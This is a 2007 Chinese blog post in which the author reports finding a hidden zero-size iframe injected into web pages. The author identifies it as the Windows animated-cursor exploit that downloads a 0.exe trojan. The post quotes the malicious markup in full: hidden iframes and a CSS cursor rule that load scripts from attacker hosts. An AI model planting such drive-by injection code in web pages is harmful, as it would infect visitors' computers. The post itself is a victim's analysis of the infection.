电脑被挂马了(Windows平台的光标漏洞)
五月 16, 2007 by 花老鼠 · Leave a Comment
前两天公司的网络瘫痪,一直没上网。今天打开浏览器发现自己的Blog上乱乱的,右键源代码便看到在第一行多了一行代码。
程序代码
<iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe>
开始自己还以为服务器中招了呢,后来发现很多站点都是这样,初步判断是自己的电脑中招了,而且公司里的电脑都被挂了。
但是发现像Google、百度等等一些站点并没有问题。在这个框架代码的页面里面有如下代码
程序代码
<iframe src='http://www.zpx520.com/0.htm' width=0 height=0>
<HTML>
<BODY style='CURSOR: url(http://q.zpx520.com/w.js)'>
</BODY>
</HTML>
<iframe src="http://q.zpx520.com/1.htm" width="0" height="0" frameborder="0">
<script src='http://s111.cnzz.com/stat.php?id=430086&web_id=430086' language='JavaScript' charset='gb2312'>
<script src='http://s61.cnzz.com/stat.php?id=474270&web_id=474270' language='JavaScript' charset='gb2312'>
<HTML>
<BODY style='CURSOR: url(http://q.zpx520.com/w.js)'>
</BODY>
</HTML>
<iframe src="http://q.zpx520.com/1.htm" width="0" height="0" frameborder="0">
<script src='http://s111.cnzz.com/stat.php?id=430086&web_id=430086' language='JavaScript' charset='gb2312'>
<script src='http://s61.cnzz.com/stat.php?id=474270&web_id=474270' language='JavaScript' charset='gb2312'>
这才明白了,这个不就是最近暴露的光标漏洞吗?所以可以断定Windows平台(HTML ASP、ASP.Net……)的站点都会有这样的问题。而这个马最终会下载一个0.exe的文件用来传播。
好像这个刚出来,还没有一个杀毒软件正面地解决它呢。真是烦人!~现在写这篇文章还是在虚拟机里写的。
更新解决方案
About 花老鼠